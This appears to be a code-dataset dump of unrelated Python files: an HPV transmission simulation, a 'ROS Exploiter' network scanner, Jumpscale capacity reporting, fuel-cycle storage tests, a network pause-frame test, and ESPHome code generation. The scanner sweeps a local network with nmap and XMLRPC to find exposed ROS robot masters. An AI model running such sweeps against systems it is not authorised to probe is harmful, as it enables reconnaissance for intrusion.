data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPV18\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPV18Infection)\n break\n\n\nclass HPVoHRInfection(Infection):\n\n def __init__(self, data, age):\n super(HPVoHRInfection, self).__init__()\n self.Type = HPVType.HPVoHR\n self.HPVClearance = data.HPV_CLEARANCE[\"HPVoHR\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPVoHR\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPVoHRInfection)\n break\n\n\nclass HPVLRInfection(Infection):\n\n def __init__(self, data, age):\n super(HPVLRInfection, self).__init__()\n self.Type = HPVType.HPVLR\n self.HPVClearance = data.HPV_CLEARANCE[\"HPVLR\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPVLR\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPVLRInfection)\n break\n\n\nclass PartnershipType(Enum):\n MARITAL = 1\n SHORT_TERM = 2\n CASUAL = 3\n INSTANTANEOUS = 4\n\n\nclass Partnership:\n\n def __init__(\n self,\n partnershipid,\n woman,\n man,\n data,\n poisson_randomizer=lambda average: np.random.poisson(average, None)):\n self.data = data\n self.partnership_id = partnershipid\n self.male = man\n self.male_id = man.id\n self.female = woman\n self.female_id = woman.id\n self.partnership_duration = 1\n self.maxdur = 12 * poisson_randomizer(self.average_duration())\n self.sexacts = poisson_randomizer(self.sex_acts())\n self.active = True\n\n def average_duration(self):\n # Kinda expected that we'd never instantiate this class directly, but instead instantiate the subclasses\n # So this really shouldn't be hit. Probably should make it error\n return -1\n\n def sex_acts(self):\n return -1\n\n def check_serodiscordance(self):\n for _, inf in self.male.Infections.items():\n inf.check_serodiscordance(self.female, self.sexacts)\n for _, inf in self.female.Infections.items():\n inf.check_serodiscordance(self.male, self.sexacts)\n\n def check_relationships(self):\n if self.female.alive and self.male.alive:\n self.check_serodiscordance()\n if self.partnership_duration < self.maxdur:\n self.partnership_duration += 1\n else:\n self.dissolve_relationship()\n else:\n self.dissolve_relationship()\n\n def dissolve_relationship(self):\n self.female.numpartners -= 1\n self.female.partnershipid.remove(self.partnership_id)\n self.male.partnershipid.remove(self.partnership_id)\n self.male.numpartners -= 1\n self.active = False\n\n\nclass Marriage(Partnership):\n def __init__(\n self,\n partnershipid,\n woman,\n man,\n duration_randomizer=lambda average: np.random.poisson(average, None)):\n super().__init__(partnershipid, woman, man, duration_randomizer)\n\n def average_duration(self):\n return self.data.DUR_MARITAL\n\n def sex_acts(self):\n return self.data.SEX_PER_MONTH_MARITAL\n\n\nclass CasualRelationship(Partnership):\n def __init__(\n self,\n partnershipid,\n woman,\n man,\n duration_randomizer=lambda average: np.random.poisson(average, None)):\n super().__init__(partnershipid, woman, man, duration_randomizer)\n\n def average_duration(self):\n return self.data.DUR_CASUAL\n\n def sex_acts(self):\n return self.data.SEX_PER_MONTH_CASUAL\n\n\nclass ShortTermRelationship(Partnership):\n def __init__(\n self,\n partnershipid,\n woman,\n man,\n duration_randomizer=lambda average: np.random.poisson(average, None)):\n super().__init__(partnershipid, woman, man, duration_randomizer)\n\n def average_duration(self):\n return self.data.DUR_SHORT_TERM\n\n def sex_acts(self):\n return self.data.SEX_PER_MONTH_SHORT_TERM\n\n\nclass InstantaneousRelationship(Partnership):\n def __init__(\n self,\n partnershipid,\n woman,\n man,\n duration_randomizer=lambda average: np.random.poisson(average, None)):\n super().__init__(partnershipid, woman, man, duration_randomizer)\n\n def average_duration(self):\n return 0\n\n def sex_acts(self):\n return 1\n\n\nclass Individual:\n month = 0\n year = 0\n\n def __init__(self,\n age,\n identifier,\n data):\n self.single = True\n self.numpartners = 0\n self.partnershipid = []\n self.alive = True\n self.Infections = dict()\n self.ClearedInfections = dict()\n self.age = age\n self.month_age = age * 12\n self.id = identifier\n self.data = data\n self.ageofpartner = data.AGE_OF_PARTNER\n self.sexualdebutage = data.SEXUAL_DEBUT_AGE\n self.partnershipformation = data.PARTNERSHIP_FORMATION\n\n def acquire_infection(self, infectiontype):\n infection_id = uuid.uuid1()\n self.Infections[infection_id] = infectiontype(self.data, self.age)\n self.data.count_incident_infections(self.Infections[infection_id])\n\n def clear_infection(self, infection_id):\n self.ClearedInfections[infection_id] = self.Infections[infection_id]\n del self.Infections[infection_id]\n\n def infection_natural_history(self):\n infections_to_clear = []\n for infid, inf in self.Infections.items():\n prob_clear = inf.get_clearance()\n rand = random.random()\n if rand < prob_clear:\n infections_to_clear.append(infid)\n else:\n inf.Timer += 1\n\n for inf in infections_to_clear:\n self.clear_infection(inf)\n\n def seed_infection(self):\n if 17 < self.age < 30:\n rand = random.random()\n if rand < 0.05:\n self.acquire_infection(HPVoHRInfection)\n elif rand < 0.15:\n self.acquire_infection(HPV16Infection)\n elif rand < 0.22:\n self.acquire_infection(HPV18Infection)\n elif rand < 0.3:\n self.acquire_infection(HPVLRInfection)\n\n def natural_history(self):\n rand = random.random()\n if rand < self.get_mortality():\n self.alive = False\n else:\n self.data.count_total_alive(self.age)\n if len(self.Infections) == 0:\n self.data.count_infection_denom(self.age)\n else:\n self.data.count_prevalent_infections(self.age)\n self.infection_natural_history()\n\n def get_mortality(self):\n pass\n\n\nclass Woman(Individual):\n def __init__(\n self,\n age,\n identifier,\n data):\n super(Woman, self).__init__(age, identifier, data)\n self.gender = Gender.FEMALE\n self.mortality = data.BACKGROUND_MORTALITY_FEMALE\n self.concurrency = data.CONCURRENCY_FEMALE\n\n def get_mortality(self):\n return self.mortality.iloc[self.age][\"mASR\"]\n\n def add_partner(self, man, relationshiptype, partnerships):\n partnership_id = uuid.uuid1()\n partnerships[partnership_id] = relationshiptype(partnership_id, self, man, self.data)\n self.numpartners += 1\n self.partnershipid.append(partnership_id)\n man.partnershipid.append(partnership_id)\n man.numpartners += 1\n\n def check_eligibility(self, man, partnerships):\n if man.alive:\n alreadypartner = False\n for key in self.partnershipid:\n if partnerships[key].female_id == self.id and partnerships[key].male_id == man.id:\n if partnerships[key].active:\n alreadypartner = True\n return not alreadypartner\n else:\n return False\n\n def get_age_of_partner(self):\n age = np.random.poisson(self.ageofpartner.iloc[self.age][\"mean\"], None)\n while age > 75:\n age = np.random.poisson(self.ageofpartner.iloc[self.age][\"mean\"], None)\n return age\n\n def create_partnership(self, lookup_table, partnerships):\n ageofpartner = self.get_age_of_partner()\n keys = list(lookup_table[ageofpartner].keys())\n random.shuffle(keys)\n # lookup by eligibility\n for m in keys:\n if self.check_eligibility(lookup_table[ageofpartner][m], partnerships):\n if lookup_table[ageofpartner][m].numpartners == 0:\n relationship_type = self.assign_partnership_type(True)\n self.add_partner(lookup_table[ageofpartner][m], relationship_type, partnerships)\n lookup_table[ageofpartner][m].single = False\n self.single = False\n self.numpartners += 1\n lookup_table[ageofpartner][m].numpartners += 1\n break\n else:\n rand = random.random()\n if rand < lookup_table[ageofpartner][m].concurrency:\n relationship_type = self.assign_partnership_type(False)\n self.add_partner(lookup_table[ageofpartner][m], relationship_type, partnerships)\n lookup_table[ageofpartner][m].single = False\n self.numpartners += 1\n self.single = False\n lookup_table[ageofpartner][m].numpartners += 1\n break\n\n def assign_partnership_type(self, single):\n if single:\n rand = random.random()\n if rand < self.data.PROB_CASUAL:\n return CasualRelationship\n elif rand < (self.data.PROB_CASUAL + self.data.PROB_MARITAL):\n return Marriage\n elif rand < (self.data.PROB_CASUAL + self.data.PROB_MARITAL + self.data.PROB_SHORT_TERM):\n return ShortTermRelationship\n else:\n return InstantaneousRelationship\n else:\n rand = random.random()\n if rand < self.data.PROB_CASUAL:\n return CasualRelationship\n else:\n return InstantaneousRelationship\n\n def run_partnerships(self, lookup_table, partnerships):\n if self.sexualdebutage <= self.age <= 74:\n if self.numpartners == 0:\n rand = random.random()\n if rand < self.partnershipformation.iloc[self.age][\"Female\"]:\n self.create_partnership(lookup_table, partnerships)\n else:\n rand = random.random()\n if rand < self.concurrency:\n self.create_partnership(lookup_table, partnerships)\n\n\nclass Man(Individual):\n def __init__(\n self,\n age,\n identifier,\n data):\n super(Man, self).__init__(age, identifier, data)\n self.gender = Gender.MALE\n self.mortality = data.BACKGROUND_MORTALITY_MALE\n self.concurrency = data.CONCURRENCY_MALE\n\n def get_mortality(self):\n return self.mortality.iloc[self.age][\"mASR\"]\n\n\nclass TimerError(Exception):\n \"\"\"A custom exception used to report errors in use of Timer class\"\"\"\n\n\nclass Timer:\n def __init__(self):\n self._start_time = None\n\n def start(self):\n \"\"\"Start a new timer\"\"\"\n if self._start_time is not None:\n raise TimerError(f\"Timer is running. Use .stop() to stop it\")\n\n self._start_time = time.perf_counter()\n\n def stop(self):\n \"\"\"Stop the timer, and report the elapsed time\"\"\"\n if self._start_time is None:\n raise TimerError(f\"Timer is not running. Use .start() to start it\")\n\n elapsed_time = time.perf_counter() - self._start_time\n self._start_time = None\n print(f\"Elapsed time: {elapsed_time:0.4f} seconds\")\n","sub_path":"sexualnetwork.py","file_name":"sexualnetwork.py","file_ext":"py","file_size_in_byte":18469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"503489203","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\nimport threading\nimport os\nfrom termcolor import colored, cprint\n\nfrom modulesROS1.toolbox import network\nfrom modulesROS1.toolbox import api\n\nclass ScannerSupport:\n \"\"\"\n Collection of support methods for ROSScanner()\n \"\"\"\n\n def __init__(self):\n self.found_master_hosts = []\n self.temp_masters_bin = []\n self.port_range_counter = 0\n self.port_range_start = 11303 # CHANGE BACK TO 1024\n self.port_range_end = 11340 # CHANGE BACK TO 65536\n self.stop_scan = False\n\n self.interface = network.InterfaceScanner().networkInterface('scan')\n self.ipscan = network.IPScanner(self.interface)\n\n\n def threadProcess(self, method):\n \"\"\" starts second process for animation purposes \"\"\"\n\n process = threading.Thread(target=method)\n process.start()\n return process\n\n\n def invalidInput(self):\n \"\"\" prints invalid input notification \"\"\"\n\n sys.stdout.write(colored(\"\\r[!] Invalid input\", 'red'))\n time.sleep(1)\n sys.stdout.flush()\n\n\n def scanStopped(self):\n \"\"\" verifies if the user wants to stop the network scan after a new ROS Master is found \"\"\"\n\n os.system('clear')\n cprint(\"[+] Network scan stopped. {} ROS Master(s) found with URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\"\\r [*] http://{}:{}\".format(master[0], master[1]), 'white')\n\n\n\nclass ROSScanner(ScannerSupport):\n \"\"\"\n Scans LAN-network for ROS Master URI with the use of NMAP and native ROS1 XMLRPC requests\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n\n def defaultMasterFinder(self):\n \"\"\" determine default ROS Master \"\"\"\n\n active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), 11311).nmapScan()\n active_hosts = [h for h in active_hosts if h != self.ipscan.ipGateway()]\n if len(active_hosts) > 0:\n for host in active_hosts:\n rpc = api.XMLRPC_API(host, 11311)\n if rpc.masterCheck() == True:\n self.found_master_hosts.append([host, 11311])\n\n\n def definedMasterFinder(self):\n \"\"\" determine custom defined ROS Master \"\"\"\n\n for port in range((self.port_range_start + self.port_range_counter), self.port_range_end):\n self.port_range_counter += 1\n if port == 11311:\n continue\n\n self.temp_masters_bin = []\n active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), port).nmapScan()\n active_hosts = [h for h in active_hosts if h != self.ipscan.ipGateway()]\n if len(active_hosts) > 0:\n for host in active_hosts:\n rpc = api.XMLRPC_API(host, port)\n if rpc.masterCheck() == True:\n self.found_master_hosts.append([host, port])\n self.temp_masters_bin.append([host, port])\n return\n\n\n def animationDefaultROS(self):\n \"\"\" process animation for defaultMasterFinder() \"\"\"\n\n chars = \"/—\\|\"\n for c in chars:\n ip_range = self.ipscan.ipConstructor()\n sys.stdout.write(\n colored('\\r[' + c + \"] \" + \"Scanning network range {} for default ROS Master on port 11311\".\n format(ip_range), 'white'))\n sys.stdout.flush()\n time.sleep(0.25)\n\n\n def animationDefinedROS(self):\n \"\"\" process animation for definedMasterFinder() \"\"\"\n\n chars = \"/—\\|\"\n for c in chars:\n percentage = self.port_range_counter / (self.port_range_end - self.port_range_start) * 100\n ip_range = self.ipscan.ipConstructor()\n sys.stdout.write(colored(\n '\\r[' + c + \"] \" + \"Scanning network range {} for ROS Master on ports 1024-65535. Scan status: [{:.2f}\".\n format(ip_range, percentage) + \"%]\", 'white'))\n sys.stdout.flush()\n time.sleep(0.25)\n\n\n def scanControllerROS1(self):\n \"\"\" binds all the above methods together and controls the ROS1 scanner processes \"\"\"\n\n while True:\n cprint(\"\\n[!] Starting basic network scan..\", 'white', attrs=['bold'])\n default_ros_scan = self.threadProcess(self.defaultMasterFinder)\n while default_ros_scan.isAlive():\n self.animationDefaultROS()\n\n if len(self.found_master_hosts) > 0:\n cprint(\"\\n[+] Scan on default ROS port completed. {} ROS Master(s) found with default URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\"\\r [*] http://{}:11311\".format(master[0]), 'white')\n\n while True:\n varify = str(input(colored(\"\\nDo you want to continue scanning the non-default ROS Master \"\n \"ports 1024-65535 on the network? (Y)es | (N)o: \", 'white')))\n if varify.lower() not in ['y', 'n']:\n self.invalidInput()\n elif varify.lower() == \"n\":\n self.scanStopped()\n return self.found_master_hosts\n else:\n break\n break\n else:\n break\n\n if len(self.found_master_hosts) == 0:\n cprint(\"\\n[-] No default ROS Master found\", 'red', attrs=['bold'])\n\n cprint(\"\\n[!] Starting extensive network scan..\", 'white', attrs=['bold'])\n\n while (self.port_range_start + self.port_range_counter) != self.port_range_end:\n defined_ros_scan = self.threadProcess(self.definedMasterFinder)\n\n while defined_ros_scan.isAlive():\n self.animationDefinedROS()\n\n if len(self.temp_masters_bin) > 0 and (self.port_range_start + self.port_range_counter) < self.port_range_end:\n cprint(\"\\n[+] Network scan paused. ROS Master found at:\", 'green', attrs=['bold'])\n for master in self.temp_masters_bin:\n cprint(\"\\r [*] {}:{}\".format(master[0], master[1]), 'white')\n\n while True:\n varify = str(input(\"\\nDo you want to continue scanning the network? (Y)es | (N)o: \"))\n if varify.lower() not in ['y', 'n']:\n self.invalidInput()\n elif varify.lower() == \"n\":\n self.scanStopped()\n return self.found_master_hosts\n else:\n break\n\n elif len(self.found_master_hosts) > 0 and (self.port_range_start + self.port_range_counter) == self.port_range_end:\n os.system('clear')\n cprint(\"[+] Network scan completed. {} ROS Master(s) found with URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\" [*] http://{}:{}\".format(master[0], master[1]), 'white')\n return self.found_master_hosts\n\n else:\n cprint(\"\\n[-] No running ROS1 environment found on network: {}\".\n format(self.ipscan.ipConstructor()), 'red', attrs=['bold'])\n time.sleep(1)\n sys.exit(\"\\n[!] Shutting down ROS Exploiter\")\n","sub_path":"ROSExploiter/ros_exploiter/modulesROS1/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"293571067","text":"import io\n\nimport requests\n\nfrom Jumpscale import j\n\n\nclass Capacity:\n def __init__(self, node):\n self._node = node\n\n def total_report(self):\n \"\"\"\n create a report of the total hardware capacity for\n processor, memory, motherboard and disks\n \"\"\"\n cl = self._node.client\n n = self._node\n\n return j.tools.capacity.parser.get_report(cl.info.cpu(), cl.info.mem(), n.disks.list())\n\n def reality_report(self):\n \"\"\"\n create a report of the actual used hardware capacity for\n processor, memory, motherboard and disks\n \"\"\"\n total_report = self.total_report()\n\n return j.tools.capacity.reality_parser.get_report(\n disks=self._node.disks.list(),\n storage_pools=self._node.storagepools.list(),\n total_cpu_nr=total_report.CRU,\n used_cpu=self._node.client.aggregator.query(\"machine.CPU.percent\"),\n used_memory=self._node.client.info.mem()[\"used\"],\n )\n\n def node_parameters(self):\n params = []\n checking = [\"development\", \"debug\", \"support\"]\n\n for check in checking:\n if self._node.kernel_args.get(check) is not None:\n params.append(check)\n\n return params\n\n def directory(self):\n if \"staging\" in self._node.kernel_args:\n # return a staging directory object\n data = {\"base_uri\": \"https://staging.capacity.threefoldtoken.com\"}\n return j.clients.threefold_directory.get(\"staging\", data=data, interactive=False)\n\n # return production directory\n return j.clients.threefold_directory.get(interactive=False)\n\n def register(self):\n farmer_id = self._node.kernel_args.get(\"farmer_id\")\n if not farmer_id:\n return False\n\n # checking kernel parameters enabled\n parameters = self.node_parameters()\n\n robot_address = \"\"\n public_addr = self._node.public_addr\n if public_addr:\n robot_address = \"http://%s:6600\" % public_addr\n os_version = \"{branch} {revision}\".format(**self._node.client.info.version())\n\n report = self.total_report()\n data = dict(\n node_id=self._node.node_id,\n location=report.location,\n total_resources=report.total(),\n robot_address=robot_address,\n os_version=os_version,\n parameters=parameters,\n uptime=int(self._node.uptime()),\n )\n data[\"farmer_id\"] = farmer_id\n\n if \"private\" in self._node.kernel_args:\n data[\"robot_address\"] = \"private\"\n elif not data[\"robot_address\"]:\n raise j.exceptions.Base(\"Can not register a node without robot_address\")\n\n client = self.directory()\n\n try:\n _, resp = client.api.RegisterCapacity(data)\n except requests.exceptions.HTTPError as err:\n j.tools.logger._log_error(\"error pusing total capacity to the directory: %s\" % err.response.content)\n\n def update_reality(self):\n farmer_id = self._node.kernel_args.get(\"farmer_id\")\n if not farmer_id:\n return False\n\n report = self.reality_report()\n data = dict(\n node_id=self._node.node_id,\n farmer_id=farmer_id,\n cru=report.CRU,\n mru=report.MRU,\n hru=report.HRU,\n sru=report.SRU,\n )\n\n client = self.directory()\n\n resp = client.api.UpdateActualUsedCapacity(data=data, node_id=self._node.node_id)\n resp.raise_for_status()\n\n def update_reserved(self, vms, vdisks, gateways):\n farmer_id = self._node.kernel_args.get(\"farmer_id\")\n if not farmer_id:\n return False\n\n report = j.tools.capacity.reservation_parser.get_report(vms, vdisks, gateways)\n data = dict(\n node_id=self._node.node_id,\n farmer_id=farmer_id,\n cru=report.CRU,\n mru=report.MRU,\n hru=report.HRU,\n sru=report.SRU,\n )\n\n client = self.directory()\n\n resp = client.api.UpdateReservedCapacity(data=data, node_id=self._node.node_id)\n resp.raise_for_status()\n","sub_path":"JumpscaleLibsExtra/sal_zos/capacity/Capacity.py","file_name":"Capacity.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"410314813","text":"\"\"\"Storage Component tests\"\"\"\n\nfrom unittest import TestCase\nimport nose \n\nfrom nose.tools import assert_equal, assert_not_equal, assert_raises, raises, \\\n assert_almost_equal, assert_true, assert_false\n\nimport os\nimport warnings\nimport tables as tb\nimport numpy as np\n\nimport BriPy\nStorage = BriPy.Storage\nMassStream = BriPy.MassStream\n\nclass TestStorageConstructors(TestCase):\n \"\"\"Tests that the storage component constructors work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_Storage_1(self):\n s = Storage()\n assert_equal(s.name, '')\n assert_equal(s.params2track, [\"Mass\"])\n\n def test_Storage_2(self):\n s = Storage(\"s\")\n assert_equal(s.name, 's')\n assert_equal(s.params2track, [\"Mass\"])\n\n\nclass TestStorageAttributes(TestCase):\n \"\"\"Tests that the fuel cycle component attributes work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_decay_time(self):\n s = Storage()\n s.decay_time = 0.0\n assert_equal(s.decay_time, 0.0)\n s.decay_time = 628 \n assert_equal(s.decay_time, 628.0)\n\n def test_params2track(self):\n s = Storage()\n assert_equal(s.params2track, [\"Mass\"])\n s.params2track = [\"Om nom nom\"]\n assert_equal(s.params2track, [\"Om nom nom\"])\n \n\nclass TestStorageMethods(TestCase):\n \"\"\"Tests that the fuel cycle component methods work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_doCalc_1(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.decay_time = 0.0\n s.IsosIn = MassStream({942390: 1.0})\n s.doCalc()\n assert_equal(s.IsosOut.mass, 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 1.0) \n\n def test_doCalc_2(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.decay_time = 0.0\n s.doCalc(MassStream({942390: 1.0}))\n assert_equal(s.IsosOut.mass, 1.0)\n assert_equal(s.IsosOut.comp[942390], 1.0) \n\n def test_doCalc_3(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.IsosIn = MassStream({942390: 1.0})\n s.doCalc(24110*365.25*24*3600)\n assert(s.IsosOut.mass < 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 0.5, 3) \n\n def test_doCalc_4(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.doCalc(MassStream({942390: 1.0}), 24110*365.25*24*3600)\n assert(s.IsosOut.mass < 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 0.5, 3) \n\n def test_setParams(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.doCalc(MassStream({942390: 1.0}), 24110*365.25*24*3600)\n s.setParams()\n assert_equal(s.ParamsIn[\"Mass\"], 1.00)\n assert(0.5 < s.ParamsOut[\"Mass\"] < 1.0)\n \n\nif __name__ == \"__main__\":\n nose.main()\n","sub_path":"BriPy/src/BriPy/tests/test_Storage.py","file_name":"test_Storage.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"438210397","text":"import pytest\nimport time\n\n\n@pytest.mark.e2e\ndef test_global_pause_e2e(api, settings, utils):\n \"\"\"\n Configure ports where,\n - tx port can respond to global pause frames\n - rx port is capable of sending global pause frames\n Configure a raw IPv4 flows on tx port where,\n - frames corresponding to all priority values are sent (counter pattern)\n - 1M frames are sent at 100% line rate and with start delay of 1s\n Configure one raw Global Pause flow on rx port where,\n - pause frames are sent for 20 seconds (pause storm)\n Validate,\n - tx/rx frame count is 0 before and 1M after pause storm\n \"\"\"\n\n size = 128\n packets = 1000000\n config = api.config()\n\n tx, rx = config.ports.port(name=\"raw_tx\", location=settings.ports[0]).port(\n name=\"raw_rx\", location=settings.ports[1]\n )\n l1 = config.layer1.layer1(\n name=\"L1\",\n port_names=[tx.name, rx.name],\n speed=settings.speed,\n )[-1]\n\n l1.flow_control.ieee_802_3x\n tx_flow, rx_flow = config.flows.flow(name=\"tx_flow\").flow(\"rx_flow\")\n tx_flow.tx_rx.port.tx_name, tx_flow.tx_rx.port.rx_name = tx.name, rx.name\n rx_flow.tx_rx.port.tx_name, rx_flow.tx_rx.port.rx_name = rx.name, tx.name\n tx_eth = tx_flow.packet.ethernet()[-1]\n tx_ipv4 = tx_flow.packet.ipv4()[-1]\n rx_eth_pause = rx_flow.packet.ethernetpause()[-1]\n tx_eth.src.value = \"00:CD:DC:CD:DC:CD\"\n tx_eth.dst.value = \"00:AB:BC:AB:BC:AB\"\n tx_ipv4.src.value = \"1.1.1.2\"\n tx_ipv4.dst.value = \"1.1.1.1\"\n tx_ipv4.priority.raw.increment.start = 0\n tx_ipv4.priority.raw.increment.step = 1\n tx_ipv4.priority.raw.increment.count = 256\n tx_flow.duration.fixed_packets.packets = packets\n tx_flow.duration.fixed_packets.delay.nanoseconds = 10 ** 9\n tx_flow.size.fixed = size\n tx_flow.rate.percentage = 100\n rx_eth_pause.src.value = \"00:AB:BC:AB:BC:AB\"\n rx_eth_pause.control_op_code.value = \"01\"\n rx_eth_pause.time.value = \"FFFF\"\n rx_flow.duration.fixed_seconds.seconds = 20\n rx_flow.size.fixed = size\n rx_flow.rate.percentage = 100\n api.set_config(config)\n utils.start_traffic(api, config)\n # wait for some packets to start flowing\n time.sleep(10)\n\n utils.wait_for(\n lambda: results_ok(api, config, utils, size, 0),\n \"stats to be as expected\",\n timeout_seconds=30,\n )\n utils.wait_for(\n lambda: results_ok(api, config, utils, size, packets),\n \"stats to be as expected\",\n timeout_seconds=30,\n )\n\n\ndef results_ok(api, cfg, utils, size, packets):\n \"\"\"\n Returns true if stats are as expected, false otherwise.\n \"\"\"\n port_results, flow_results = utils.get_all_stats(api)\n\n return packets == sum(\n [p.frames_tx for p in port_results if p.name == \"raw_tx\"]\n )\n","sub_path":"tests/pfc/test_global_pause_e2e.py","file_name":"test_global_pause_e2e.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201851725","text":"from collections import OrderedDict\nimport math\n\n# pylint: disable=unused-import, wrong-import-order\nfrom typing import Any, Generator, List, Optional, Tuple, Type, Union, Dict, Callable # noqa\n\nfrom esphome.core import ( # noqa\n CORE, HexInt, ID, Lambda, TimePeriod, TimePeriodMicroseconds,\n TimePeriodMilliseconds, TimePeriodMinutes, TimePeriodSeconds, coroutine)\nfrom esphome.helpers import cpp_string_escape, indent_all_but_first_and_last\nfrom esphome.py_compat import integer_types, string_types, text_type\n\n\nclass Expression(object):\n def __init__(self):\n self.requires = []\n self.required = False\n\n def __str__(self):\n raise NotImplementedError\n\n def require(self):\n self.required = True\n for require in self.requires:\n if require.required:\n continue\n require.require()\n\n def has_side_effects(self):\n return self.required\n\n\nSafeExpType = Union[Expression, bool, str, text_type, int, float, TimePeriod,\n Type[bool], Type[int], Type[float]]\n\n\nclass RawExpression(Expression):\n def __init__(self, text): # type: (Union[str, unicode]) -> None\n super(RawExpression, self).__init__()\n self.text = text\n\n def __str__(self):\n return str(self.text)\n\n\n# pylint: disable=redefined-builtin\nclass AssignmentExpression(Expression):\n def __init__(self, type, modifier, name, rhs, obj):\n super(AssignmentExpression, self).__init__()\n self.type = type\n self.modifier = modifier\n self.name = name\n self.rhs = safe_exp(rhs)\n self.requires.append(self.rhs)\n self.obj = obj\n\n def __str__(self):\n type_ = self.type\n return u\"{} {}{} = {}\".format(type_, self.modifier, self.name, self.rhs)\n\n def has_side_effects(self):\n return self.rhs.has_side_effects()\n\n\nclass ExpressionList(Expression):\n def __init__(self, *args):\n super(ExpressionList, self).__init__()\n # Remove every None on end\n args = list(args)\n while args and args[-1] is None:\n args.pop()\n self.args = []\n for arg in args:\n exp = safe_exp(arg)\n self.requires.append(exp)\n self.args.append(exp)\n\n def __str__(self):\n text = u\", \".join(text_type(x) for x in self.args)\n return indent_all_but_first_and_last(text)\n\n\nclass TemplateArguments(Expression):\n def __init__(self, *args): # type: (*SafeExpType) -> None\n super(TemplateArguments, self).__init__()\n self.args = ExpressionList(*args)\n self.requires.append(self.args)\n\n def __str__(self):\n return u'<{}>'.format(self.args)\n\n\nclass CallExpression(Expression):\n def __init__(self, base, *args): # type: (Expression, *SafeExpType) -> None\n super(CallExpression, self).__init__()\n self.base = base\n if args and isinstance(args[0], TemplateArguments):\n self.template_args = args[0]\n self.requires.append(self.template_args)\n args = args[1:]\n else:\n self.template_args = None\n self.args = ExpressionList(*args)\n self.requires.append(self.args)\n\n def __str__(self):\n if self.template_args is not None:\n return u'{}{}({})'.format(self.base, self.template_args, self.args)\n return u'{}({})'.format(self.base, self.args)\n\n\nclass StructInitializer(Expression):\n def __init__(self, base, *args): # type: (Expression, *Tuple[str, SafeExpType]) -> None\n super(StructInitializer, self).__init__()\n self.base = base\n if isinstance(base, Expression):\n self.requires.append(base)\n if not isinstance(args, OrderedDict):\n args = OrderedDict(args)\n self.args = OrderedDict()\n for key, value in args.items():\n if value is None:\n continue\n exp = safe_exp(value)\n self.args[key] = exp\n self.requires.append(exp)\n\n def __str__(self):\n cpp = u'{}{{\\n'.format(self.base)\n for key, value in self.args.items():\n cpp += u' .{} = {},\\n'.format(key, value)\n cpp += u'}'\n return cpp\n\n\nclass ArrayInitializer(Expression):\n def __init__(self, *args, **kwargs): # type: (*Any, **Any) -> None\n super(ArrayInitializer, self).__init__()\n self.multiline = kwargs.get('multiline', False)\n self.args = []\n for arg in args:\n if arg is None:\n continue\n exp = safe_exp(arg)\n self.args.append(exp)\n self.requires.append(exp)\n\n def __str__(self):\n if not self.args:\n return u'{}'\n if self.multiline:\n cpp = u'{\\n'\n for arg in self.args:\n cpp += u' {},\\n'.format(arg)\n cpp += u'}'\n else:\n cpp = u'{' + u', '.join(str(arg) for arg in self.args) + u'}'\n return cpp\n\n\nclass ParameterExpression(Expression):\n def __init__(self, type, id):\n super(ParameterExpression, self).__init__()\n self.type = type\n self.id = id\n\n def __str__(self):\n return 